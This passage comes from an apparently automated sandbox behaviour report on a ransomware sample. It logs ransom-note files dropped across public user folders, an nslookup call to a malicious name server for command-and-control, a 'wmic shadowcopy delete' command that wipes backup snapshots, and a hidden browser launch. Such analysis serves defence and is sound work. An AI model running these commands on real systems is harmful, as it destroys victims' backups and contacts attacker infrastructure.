File Create filename = C:\Users\Public\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Libraries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Music\Sample Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Pictures\Sample Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Recorded TV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Recorded TV\Sample Media\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\Videos\Sample Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Process #27: nslookup.exe
Information Value
ID #27
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:07, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:13
OS Process Information
Information Value
PID 0x418
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x44C, 0x464
Region
Threads
Thread 0x44c
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-04 08:54:17 (UTC) True 1
System Get Time type = Ticks, time = 13462 True 1
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x9a0000 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
DNS Get Hostname name_out = YKyd69q True 1
DNS Resolve Name host = ns1.wowservers.ru, address_out = 81.4.163.122, 221.120.220.72, 197.254.118.42, 190.35.242.126 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Socket Close type = SOCK_DGRAM True 1
Process #28: nslookup.exe
Information Value
ID #28
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:15, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
Information Value
PID 0x5e8
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x5F8, 0x608
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000720000 0x00720000 0x0081ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000009b0000 0x009b0000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x00000000009b0000 0x009b0000 0x00b1ffff Private Memory Readable, Writable True False False -
private_0x0000000000b70000 0x00b70000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x0000000000b80000 0x00b80000 0x00bbffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00ce0000 0x00cfdfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000d00000 0x00d00000 0x020fffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02100000 0x023cefff Memory Mapped File Readable False False False -
private_0x00000000023d0000 0x023d0000 0x0258ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x735d0000 0x735d6fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73600000 0x73637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x73640000 0x73645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x73650000 0x73654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73660000 0x73667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x736b0000 0x736c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x736d0000 0x736dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x5f8
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-04 08:54:25 (UTC) True 1
System Get Time type = Ticks, time = 21481 True 1
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xce0000 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
DNS Get Hostname name_out = YKyd69q True 1
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Socket Close type = SOCK_DGRAM True 1
Process #29: wmic.exe
Information Value
ID #29
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:21, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:59
OS Process Information
Information Value
PID 0x614
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x604, 0x61C, 0x618, 0x63C, 0x640
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
msxml3r.dll 0x001c0000 0x001c0fff Memory Mapped File Readable False False False -
private_0x00000000001d0000 0x001d0000 0x001effff Private Memory - True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00280000 0x00280fff Memory Mapped File Readable False False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0034ffff Private Memory Readable, Writable True False False -
index.dat 0x002e0000 0x002ebfff Memory Mapped File Readable, Writable True True False
index.dat 0x002f0000 0x002f7fff Memory Mapped File Readable, Writable True True False
index.dat 0x00300000 0x0030ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x0035cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00350000 0x00354fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004dffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000580000 0x00580000 0x00707fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000710000 0x00710000 0x00890fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x008d0000 0x00932fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000940000 0x00940000 0x01d3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d50000 0x01d50000 0x01d8ffff Private Memory Readable, Writable True False False -
private_0x0000000001d90000 0x01d90000 0x01dcffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x0211ffff Private Memory Readable, Writable True False False -
private_0x0000000002120000 0x02120000 0x022cffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x02120000 0x021dffff Memory Mapped File Readable, Writable False False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002290000 0x02290000 0x022cffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x023cffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002450000 0x02450000 0x0284ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x029dffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002850000 0x02850000 0x0292efff Pagefile Backed Memory Readable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002a10000 0x02a10000 0x02a4ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c90000 0x02c90000 0x02ccffff Private Memory Readable, Writable True False False -
wmiutils.dll 0x732d0000 0x732e6fff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x73300000 0x73317fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x73320000 0x733b5fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x733c0000 0x733cefff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x733d0000 0x73502fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73510000 0x7356bfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x73570000 0x73579fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x73580000 0x73587fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x73590000 0x7359cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x735a0000 0x735d4fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x604
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-04 08:54:31 (UTC) True 1
System Get Time type = Ticks, time = 27674 True 1
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x8d0000 True 1
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x76e80000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76eaa84f True 1
System Get Computer Name result_out = YKYD69Q True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = Local Time, time = 2018-06-04 08:54:32 (Local Time) True 1
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Process #33: iexplore.exe
Information Value
ID #33
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:24, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:56
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x690
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
